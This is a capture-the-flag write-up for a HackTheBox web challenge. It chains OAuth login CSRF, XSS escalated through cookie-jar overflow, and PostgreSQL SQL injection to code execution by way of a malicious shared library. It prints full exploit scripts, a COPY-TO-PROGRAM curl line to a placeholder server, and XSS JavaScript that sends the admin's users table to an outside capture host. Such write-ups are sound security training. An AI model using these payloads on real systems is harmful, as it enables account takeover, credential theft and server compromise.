HackTheBox - CyberApocalypse 2025 Aurors Archive

28/03/2025 - 8 minutes

2025 CSRF OAuth PostgreSQL RCE SQLi XSS cookie-overflow ctfs hacking htb-cyberapocalypse web
  1. 1 Intro
  2. 2 Recon
    1. 2.1 Application setup
    2. 2.2 Basic functionality
      1. 2.2.1 Login
      2. 2.2.2 Main application
        1. 2.2.2.1 My Submissions
        2. 2.2.2.2 Making a submission
    3. 2.3 Code review
      1. 2.3.1 Admin bot
      2. 2.3.2 OAuth service
      3. 2.3.3 Admin panel
    4. 2.4 Vulnerability discovery and exploitation
      1. 2.4.1 SQLi
      2. 2.4.2 XSS
      3. 2.4.3 OAuth
      4. 2.4.4 Chaining everything together
        1. 2.4.4.1 OAuth
        2. 2.4.4.2 XSS
  3. 3 1-Click RCE exploit video

# Intro

Aurors Archive is a web challenge from the HTB CyberApocalypse 2025 CTF. Really enjoyed solving this challenge with the rest of the team. In this CTF we played Thread In The Needle X CYberMouflons. This challenge was a web challenge that required a lot of code review and chaining of different vulnerabilities. Even though this made it a really hard challenge to solve, the truth is that out there in the wild you need to combine and chain vulnerabilities to make some impact (ethically of course)! The challenge involved OAuth account forced linking, XSS, SQLi, and finally RCE to read the flag.

After reading other teams writeups including the HackTheBox official one. It seems that we were one of the only teams to actually solve the challenge using the closest to the intended path. Everything except the CSTI part. It is always nice to see some unintended solutions that have slipped even through the author's eyes.

# Recon

# Application setup

application structure

[supervisord]
user=root
nodaemon=true
stderr_logfile=/dev/null
stdout_logfile=/dev/null

[program:postgres]
command=postgres -D /var/lib/postgresql/data
autostart=true
user=postgres
autorestart=true
stderr_logfile=/dev/null
stdout_logfile=/dev/null

[program:oauth]
command=node index.js
directory=/OAuthServer
autostart=true
autorestart=true
stderr_logfile=/dev/null
stdout_logfile=/dev/null

[program:nodeapp]
command=node index.js
directory=/app
autostart=true
autorestart=true
stderr_logfile=/dev/stderr
stdout_logfile=/dev/stdout

[program:nginx]
command=nginx -g 'daemon off;'
directory=/app
autostart=true
autorestart=true
stderr_logfile=/dev/null
stdout_logfile=/dev/null

This application is made out of 4 main components.

Dockerfile

# Add readflag binary
COPY config/readflag.c /
RUN gcc -o /readflag /readflag.c -Wimplicit-function-declaration && chmod 4755 /readflag && rm /readflag.c

# Copy flag
COPY flag.txt /root/flag

Since the flag is only retrieved by executing /readflag we need RCE

# Basic functionality

# Login

In order to login to the application we are met with two options, either login with a username and password or login with OAuth. We can't login at all since we don't have any credentials, so lets click the OAuth option.

Luckily there we can find a Register here. Let's click it. After we login in with our newly created account. We are met with a classic OAuth authorization page.

# Main application

This application seems to represent some kind of an auction house. Immediately from the navbar we can see that a user has the option to place a resource for auction, submit bids and view auction submissions.

# My Submissions

Here we can see that we have the option to view our submissions. Let's try to place a submission.

# Making a submission

We can see that we can make submissions which require the details above.

# Code review

# Admin bot

This bot is supposed to mimic the actions of an administrator. And the below bot is initiated with urls of submissions bot.js

const browser = await puppeteer.launch({
    headless: true,
    args: [
      '--no-sandbox',
      '--disable-popup-blocking',
      '--disable-background-networking',
      '--disable-default-apps',
      '--disable-extensions',
      '--disable-gpu',
      '--disable-sync',
      '--disable-translate',
      '--hide-scrollbars',
      '--metrics-recording-only',
      '--mute-audio',
      '--no-first-run',
      '--safebrowsing-disable-auto-update',
      '--js-flags=--noexpose_wasm,--jitless'
    ],
    userDataDir: USER_DATA_DIR,
  });

const adminPassword = process.env.ADMIN_PASSWORD;
if (!adminPassword) {
  throw new Error("Admin password not set in environment variables.");
}

await page.goto("http://127.0.0.1:1337/");
console.log(await browser.cookies());
if (page.url() != "http://127.0.0.1:1337/") {
  console.log("loggingin IN");
  await page.type('input[name="username"]', "admin");
  await page.type('input[name="password"]', adminPassword);

  await Promise.all([
	page.click('button[type="submit"]'),
	page.waitForNavigation({ waitUntil: "networkidle0" }),
  ]);
  console.log(await browser.cookies());

} else {
  console.log("already logged in")
  console.log(await page.url());
}

Something that stands out is that there is a persistent USER_DATA_DIR directory, making cookies persistent throughout bot runs.

In addition we can see that the bot will login with the admin's credentials unless already logged in. To trigger the login action, one must send the bot to the url http://127.0.0.1:1337/

routes/api.js

router.post("/submissions", isAuthenticated, async (req, res) => {
	try {
		const userId = req.session.userId;
		const { name, description, url, category } = req.body;
		const newSubmission = await createSubmission({
			name,
			description,
			url,
			category,
			userId,
		});

		res.status(201).json({ success: true, submission: newSubmission });

		setImmediate(async () => {
			try {
				console.log(`Processing URL in the background: ${url}`);
				await processURLWithBot(url);
			} catch (botError) {
				console.error("Bot encountered an error:", botError);
			}
		});
	} catch (err) {
		console.error("Error creating submission:", err);
		const message =
			err.message.includes("required") ||
			err.message.includes("Invalid URL")
				? err.message
				: "Internal server error.";
		return res.status(500).json({ success: false, message });
	}
});

# OAuth service

The author of the challenge here, decided to make a custom implementation of the OAuth system. Something that we should particularly pay attention, as custom implementations of such complex systems, tend to be prone to errors.

The typical login flow looks something like below.

GET /oauth/authorize?response_type=code&client_id=doMq8wuSLDbhEAxzbV7lQd8nVECC3ALVL4GYNkGYF0&redirect_uri=%2Fcallback&scope=read HTTP/1.1
Host: 127.0.0.1:1337

The above request is made by the user, requesting to be granted read access by the OAuth service.

POST /oauth/authorize HTTP/1.1
Host: 127.0.0.1:1337
Content-Length: 127

response_type=code&client_id=doMq8wuSLDbhEAxzbV7lQd8nVECC3ALVL4GYNkGYF0&redirect_uri=%2Fcallback&scope=read&state=&approve=true

Once the user approves the permissions given by the OAuth service and follows the callback endpoint with the given code(returned by the OAuth service), the OAuth service will log that user into the application.

# Admin panel

// Serve Admin Panel UI
router.get("/admin", isAdmin, (req, res) => {
  res.render("admin.html", { title: "Admin Panel" });
});

// Endpoint: Get list of tables (PostgreSQL version)
router.get("/tables", isAdmin, async (req, res) => {
  try {
    // PostgreSQL query to list tables in the 'public' schema
    const tables = await runReadOnlyQuery(`
      SELECT table_name
      FROM information_schema.tables
      WHERE table_schema = 'public'
        AND table_type = 'BASE TABLE'
      ORDER BY table_name;
    `);
    res.json({ success: true, tables });
  } catch (error) {
    console.error("Fetching Tables Error:", error);
    res
      .status(500)
      .json({ success: false, message: "Error fetching tables" });
  }
});

// New Endpoint: Get all records from a specified table (POST version)
router.post("/table", isAdmin, async (req, res) => {
  const { tableName } = req.body;
  try {
    const query = `SELECT * FROM "${tableName}"`;

    if (query.includes(';')) {
      return res
        .status(400)
        .json({ success: false, message: "Multiple queries not allowed!" });
    }

    const results = await runReadOnlyQuery(query);
    res.json({ success: true, results });
  } catch (error) {
    console.error("Table Query Error:", error);
    res.status(500).json({
      success: false,
      message: "Error fetching table data.",
    });
  }
});

The admin panel is short and sweet. It allows an administrator to view the tables in the database.

# Vulnerability discovery and exploitation

Working backwards, since we know that our end goal is to gain RCE we need to find an attack vector that could lead us to it. The most obvious candidate is the SQLi in the admin panel. Which makes some sense as that application functionality is only unlocked once someone becomes the admin.

# SQLi

Using the working backwards approach we can start by trying to escalate our SQLi -> RCE. PostgreSQL RCE. Visiting our good friend hacktricks we can see that there seems to be a won't fix vulnerability since postgres 9.3 where superusers can abuse the COPY functionality to gain RCE.

'; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- -

Wonderful! But lets not get ahead of ourselves, the above requires stacked queries which we don't have. After attempting multiple bypasses, e.g trying to fit the above in a UNION SELECT or passing the ; in other formats so that the check gets tricked. We can't seem to get it to work, so back to the drawing table.

Eventually we stumble upon this technique select only RCE The title sounds quite promising since we seem to be able to do only SELECT queries. Quoting the summarized procedure from the article.

read the current config
1. get all loaded config files
SELECT sourcefile FROM pg_file_settings; 
2. read the config file into the pg_largeobject with a chosen id, e.g. 31337
SELECT lo_import('/path/to/config...', 31337);  
3. get contents of the pg_largeobject with id from the previous query
SELECT lo_get(31337); 

modify the current config
1. Decode new config from base64 and store it in a pg_largeobject with a chosen id, e.g. 133337
SELECT lo_from_bytea(133337, decode('IyAtIENv...ZC5zbyc=', 'base64'));
2. Write pg_largeobject with the id from the previous query on a disk to an original config's path
SELECT lo_export(133337, '/path/to/config...'));

compile and upload malicious .so lib
1. Get the current PostgreSQL version
SELECT version()
2. Upload first .so library chunk in the pg_largeobject with a chosen id, e.g. 133338
SELECT lo_from_bytea(133338, decode('f0VMRgIBAQ...AAA=', 'base64'));
3..n. Upload next .so library chunks into the pg_largeobject with id from the previous query
SELECT lo_put(133338, 2048*n, decode('AAAAAA...AAAA=', 'base64'));
n+1. Write the .so library into the path, specified in the overwritten config
SELECT lo_export(133338, '/tmp/payload.so')

reload the config
1. Trigger the built-in pg_reload_conf(), available to admins
SELECT pg_reload_conf()

The above steps can be implemented with python like below. The library code used is the same as the one referenced in the article

import requests
import base64
import json
import os
import time
import random

# URL = 'http://127.0.0.1:1337'
URL = 'http://94.237.55.91:43684'

s = requests.Session()
username = 'admin'
password = 'NvRHirF4rdE9sS+GnAI0jqMYUmxlha5tiTgBhhRg0CQ='
r = s.post(f"{URL}/api/login", json={"username": username, "password": password})
print(r.json())

def sqli(payload:str):
    data = {"tableName": f"users\" UNION {payload} --"}
    r = s.post(f"{URL}/table", json=data)
    return r.json()

config_file = "/var/lib/postgresql/data/postgresql.conf"
config_id = random.randint(1, 1000000)
print(config_file)

print(sqli(f"SELECT 1, 'a', lo_import('{config_file}', 31337)::text"))

print(sqli("SELECT 1, 'a', lo_get(31337)"))

with open('postgresql.conf', 'r') as f:
    payload = f.read()
    payload_b64 = base64.b64encode(payload.encode()).decode()
    print(sqli(f"SELECT 1, 'a', lo_from_bytea({config_id}, decode('{payload_b64}', 'base64'))::text"))
    print(sqli(f"SELECT 1, 'a', lo_export({config_id}, '{config_file}')::text"))


lib_id = random.randint(1, 1000000)
os.system("docker cp payload.c web_aurorus_archive:/tmp/payload.c")
os.system("docker cp compile.sh web_aurorus_archive:/tmp/compile.sh")
os.system("docker exec web_aurorus_archive sh /tmp/compile.sh")
os.system("docker cp web_aurorus_archive:/tmp/payload_compiled.so payload.so")

chunk_size = 2048

first_chunk = True
with open('payload.so', 'rb') as f:
    index = 0
    while True:
        chunk = f.read(chunk_size)
        payload_b64 = base64.b64encode(chunk).decode()
        if not chunk:
            break
        if first_chunk:
            print(sqli(f"SELECT 1, 'a', lo_from_bytea({lib_id}, decode('{payload_b64}', 'base64'))::text"))
            first_chunk = False
        else:
            print(sqli(f"SELECT 1, 'a', lo_put({lib_id}, {chunk_size*index} , decode('{payload_b64}', 'base64'))::text"))
        index += 1

print(sqli(f"SELECT 1, 'a', lo_export({lib_id}, '/tmp/payload.so')::text"))
print(sqli("SELECT 1, 'a', pg_reload_conf()::text"))
time.sleep(10)
print(sqli("SELECT 1, 'a', pg_reload_conf()::text"))

Some notes:

Alright so we have now achieved SQLi -> RCE

We now need to become the admin to gain access to that endpoint

# XSS

In order to become the admin we must gain the admin's credentials, which can easily be done via the tables view in the admin panel. By just requesting the users table the admin password will be retrieved in plaintext.

By hunting through the source code we can see the below line in my_submissions.html

<div id="submissions-data" data-submissions='{{ submissions | dump | safe }}'></div>

The submission variables is passed through SAFE. But the question becomes: Is it really safe?.

By submitting a submission that escapes the data-submissions attribute, we can gain XSS.

A payload like below:

asd'}]'><script src='https://attacker-url/xpl.js'></script>

would execute arbitrary javascript in the browser of the my-submissions page visitor. However there is a small issue. As the page suggests it is MY submissions, meaning that only the creator of a submission would see the submission itself. Downgrading this vulnerability to self-XSS. This finding was left to that, while we explored the rest of the application source code with this option in mind.

# OAuth

By looking through the login flow we found that the last request

GET /callback?code=81bc9d050342ee67f2cd1d76735c535e1ec5a166 HTTP/1.1
Host: 127.0.0.1:1337

links the application user to the OAuth account. Since there is no state parameter used during the linking process we can abuse it as a login CSRF to link the attacker user to the admin user by logging into the attacker account from the admin. As we can submit this linking url to the admin to view (via a submission) we managed to escalate our self-XSS -> XSS.

# Chaining everything together

# OAuth

The steps to link our account to the admin's account are the below

# XSS

We can now serve our self-XSS to the admin as he now is able to see our submissions. However there is a small issue. By linking the attacker and the admin accounts. We essentially lose the admin functionality. A cool trick can be utilized here to get the best of both worlds. By placing a cookie with a path attribute, we can have the admin be logged in as admin at every endpoint except the my-submissions page. This happens as a cookie with the path attribute gets priority over other cookies (at the specific endpoint). However once the admin has been downgraded (to the attacker user) he can no longer login as admin again.

await page.goto("http://127.0.0.1:1337/");
    console.log(await browser.cookies());
    if (page.url() != "http://127.0.0.1:1337/") {
      console.log("loggingin IN");

Essentially the only way for the admin to login, is for him to receive a redirect to /login after visiting the application. However, this won't happen as the admin is logged in with his previous downgraded session (Even though the admins cookie came from the admin logging in, the req.session.username linked to the cookie, now points to the attacker user). In order to bypass this restriction, we can employ yet another technique: cookie overflowing. By basically overflowing the browsers cookie jar (from our XSS), we can remove old admin cookie (even though it is http-only), place our new fixed-path cookie (attacker) and then allowing the bot to re-login as admin (as there will now be a redirect to /login as our attacker cookie, no longer covers that endpoint). The admin will now have 2 cookies. Making him logged in as admin to the whole application except my-submissions.

Allowing us to then run a stage 2 payload that would exfiltrate the users table (and by result admin password) using our now escalated XSS

An automated script of the whole exploitation as described above, can be found below 1 CLICK RCE (almost you have to input the password exfiltrated maually)

import base64
import json
import os
import random
import string
import time

import requests
from requestrepo import Requestrepo

URL = "http://127.0.0.1:1337"
URL = "http://94.237.57.230:32083"

DEBUG = True
DELAY = 7

client = Requestrepo(
    token="",
    host="requestrepo.com",
    port=80,
    protocol="http",
)
print(client.domain)


def debug():
    if DEBUG:
        input("Execute? >")


def submit_resource(name="name", url="https://example.com"):
    xss_payload_data = {
        "name": name,
        "description": "asd",
        "url": url,
        "category": "lore",
    }
    s.post(f"{URL}/api/submissions", json=xss_payload_data)


random_username = "".join(random.choices(string.ascii_letters + string.digits, k=8))
reg_data = {"username": random_username, "password": random_username}

s = requests.Session()

print(f"Registering account: {random_username}")
debug()
s.post(f"{URL}/oauth/register", data=reg_data)

print("Getting OAuth client id...")
debug()
r = s.get(f"{URL}/api/config")
r = json.loads(r.text)
oauthClientId = r["oauthClientId"]
print(f"Got client ID: {oauthClientId}")

print("Creating a callback code")
debug()
auth_data = {
    "response_type": "code",
    "client_id": oauthClientId,
    "redirect_uri": "/callback",
    "scope": "read",
    "state": "",
    "approve": "true",
}
r = s.post(f"{URL}/oauth/authorize", data=auth_data, allow_redirects=False)
callback_code = r.headers["Location"].split("code=")[1]
print(f"user callback code: {callback_code}")

print("Authorizing user account")
debug()
# Auth with the callback code
s.get(f"{URL}/callback?code={callback_code}")

print("Loggging in as user")
debug()

login_data = {"code": callback_code}
r = s.post(f"{URL}/api/oauthLogin", json=login_data)
user_cookie = r.cookies.get("connect.sid")
print(f"User cookie: {user_cookie}")

# STAGE 1
print("Setting up stage 1")
stage1 = (
    """const cookie_jar_size = 300;

for (let i = 0; i < cookie_jar_size; i++) {
    document.cookie = 'cookie'+i+'=A;';
}

for(let i = 0; i < cookie_jar_size; i++) {
    document.cookie = `cookie${i}=A; expires=Thu, 01 Jan 1970 00:00:00 UTC;`;
}

document.cookie = 'connect.sid="""
    + f"{user_cookie}; path=/my-submissions; expires=Thu, 01 Jan 2026 00:00:00 UTC;'"
)
client.update_http(
    raw=stage1.encode(), headers={"Content-Type": "application/javascript"}
)
xss_payload = "asd'}]'>" + f"<script src='http://{client.domain}/a.js'></script>"

print("Submitting XSS Payload to user account...")
debug()
submit_resource(name=xss_payload)
time.sleep(DELAY)

print("Linking admin account with user account")
debug()

submit_resource(url=f"http://127.0.0.1:1337/callback?code={callback_code}")
time.sleep(DELAY)

print("Admin is visiting the XSS payload...")
debug()
submit_resource(url="http://127.0.0.1:1337/my-submissions")
time.sleep(DELAY)

print("Updating to stage 2")
# STAGE 2
stage2 = (
    """
fetch("/table", {
	method: "POST",
	headers: { "Content-Type": "application/json" },
	body: JSON.stringify({ tableName: "users" }),
})
	.then((res) => res.json())
	.then((res) =>
		fetch(
"""
    + f"""
			`http://{client.domain}?password=`.concat(
				JSON.stringify(res)
			)
		)
	);
"""
)
client.update_http(
    raw=stage2.encode(), headers={"Content-Type": "application/javascript"}
)

print(
    "Admin is visiting the XSS payload (with their credentials) HE WILL LOGIN AGAIN..."
)
debug()
submit_resource(url="http://127.0.0.1:1337/my-submissions")

admin_password = input("Admin password: ")

print("Getting RCE baby!!!")
debug()

s = requests.Session()
username = "admin"
r = s.post(f"{URL}/api/login", json={"username": username, "password": admin_password})
print(r.json())


def sqli(payload: str):
    data = {"tableName": f'users" UNION {payload} --'}
    r = s.post(f"{URL}/table", json=data)
    return r.json()


config_file = "/var/lib/postgresql/data/postgresql.conf"
config_id = random.randint(1, 1000000)
print(config_file)

print(sqli(f"SELECT 1, 'a', lo_import('{config_file}', 31337)::text"))
print(sqli("SELECT 1, 'a', lo_get(31337)"))

with open("postgresql.conf", "r") as f:
    payload = f.read()
    payload_b64 = base64.b64encode(payload.encode()).decode()
    print(
        sqli(
            f"SELECT 1, 'a', lo_from_bytea({config_id}, decode('{payload_b64}', 'base64'))::text"
        )
    )
    print(sqli(f"SELECT 1, 'a', lo_export({config_id}, '{config_file}')::text"))


lib_id = random.randint(1, 1000000)
os.system("docker cp payload.c web_aurorus_archive:/tmp/payload.c")
os.system("docker cp compile.sh web_aurorus_archive:/tmp/compile.sh")
os.system("docker exec web_aurorus_archive sh /tmp/compile.sh")
os.system("docker cp web_aurorus_archive:/tmp/payload_compiled.so payload.so")

chunk_size = 2048

first_chunk = True
with open("payload.so", "rb") as f:
    index = 0
    while True:
        chunk = f.read(chunk_size)
        payload_b64 = base64.b64encode(chunk).decode()
        if not chunk:
            break
        if first_chunk:
            print(
                sqli(
                    f"SELECT 1, 'a', lo_from_bytea({lib_id}, decode('{payload_b64}', 'base64'))::text"
                )
            )
            first_chunk = False
        else:
            print(
                sqli(
                    f"SELECT 1, 'a', lo_put({lib_id}, {chunk_size * index} , decode('{payload_b64}', 'base64'))::text"
                )
            )
        index += 1

print(sqli(f"SELECT 1, 'a', lo_export({lib_id}, '/tmp/payload.so')::text"))
print(sqli("SELECT 1, 'a', pg_reload_conf()::text"))
time.sleep(DELAY * 2)
print(sqli("SELECT 1, 'a', pg_reload_conf()::text"))

# 1-Click RCE exploit video